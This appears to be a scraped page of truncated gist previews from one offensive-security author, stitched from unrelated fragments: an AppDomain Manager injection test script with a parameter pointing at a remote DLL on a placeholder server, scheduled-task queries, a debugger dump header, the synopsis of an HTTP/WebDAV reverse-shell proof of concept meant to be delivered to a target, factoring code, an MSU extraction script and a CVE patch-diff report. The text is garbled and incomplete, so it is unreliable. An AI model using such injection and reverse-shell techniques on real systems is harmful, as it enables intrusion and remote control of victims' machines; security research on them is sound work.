secdev02

# AppDomain Manager Injection Detection Tests
# This script tests three methods of AppDomain Manager injection

param(
    [string]$TestExecutable = "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    [string]$RemoteServer = "http://yourserver.com/tasks.dll",
    [string]$Base64RemoteDll = ""
)

$ErrorActionPreference = "Stop"

secdev02

Get-ScheduledTask | Where-Object {$_.Actions.Execute -like 'cmd.exe'} | Select-Object TaskName, TaskPath, State

Get-ScheduledTask | ForEach-Object {
    $task = $_
    $_.Actions | Where-Object {$_.Execute -like '*cmd.exe*'} | ForEach-Object {
        [PSCustomObject]@{
            TaskName = $task.TaskName
            TaskPath = $task.TaskPath
 State = $task.State

secdev02

Microsoft (R) Windows Debugger Version 6.12.0002.633 X86
Copyright (c) Microsoft Corporation. All rights reserved.

Loading Dump File [C:\dumps\regret.dmp]
User Mini Dump File: Only registers, stack and portions of memory are available

Symbol search path is: SRV*c:\symbols*http://msdl.microsoft.com/download/symbols
Executable search path is: 
Windows XP Version 2600 (Service Pack 2) MP (2 procs) Free x86 compatible
Product: WinNt, suite: SingleUserTS

secdev02

============================================================ [09:00:11] 🚀 SMART TOOL: RENAME ALL FUNCTIONS

Starting OPTIMIZED bulk function analysis with mode: smart_enumeration

============================================================ [09:00:11] ⚡ PERFORMANCE ENHANCEMENTS

• Batch processing (size: 50)

secdev02

<#
Obtained from https://github.com/re4lity/subTee-gits-backups/blob/master/JEWebDav.ps1
#>

<#
  .SYNOPSIS
  
  Simple Reverse Shell over HTTP. Deliver the link to the target and wait for connectback.
  
  Read And Write Files Over WebDAV Proof Of Concept

secdev02

import math
import time

def gcd_factorial_efficient(n):
    """Compute GCD(sqrt(n)!, n) efficiently"""
    sqrt_n = int(math.sqrt(n))
    g = n
    
    print(f"Computing GCD({sqrt_n}!, {n})")
    print(f"Processing {sqrt_n} numbers...\n")

secdev02

A single file that has 2 different ways of behaving

IN this case we simply load and compile 2 difference C# calls.

Use your imagination.

secdev02

using System;
using System.Configuration;
using System.IO;
using System.Net;

namespace HelloWorldLib
{
    public class HelloWorld
    {
        private static Configuration _config;

secdev02

<#
.SYNOPSIS
    Extracts a specific file from nested CAB files within an MSU package.

.DESCRIPTION
    Extracts MSU to get CAB files, then extracts a specific file by name,
    and performs additional expansion rounds if the file is itself a CAB.

.PARAMETER MsuPath
    Path to the MSU file.

secdev02

cl1p.net - The internet clipboard Login/Sign Up cl1p.net/cves
Here is your stuff. Thanks for using cl1p. Tell your friends! Copy
Upgrade to PRO
{'file': 'kerberos.dll', 'patch_store_uid': 'c7eae9d4-8362-478d-b184-e4abea470c2b', 'kb': 'KB5068861', 'confidence': 0.15, 'date': 1763412539.2780097, 'cve': 'CVE-2025-60704', 'change_count': 22}
--------------------------------------------------------------------
CVE-2025-60704 Report
--------------------------------------------------------------------

Component
--------------------------------------------------------------------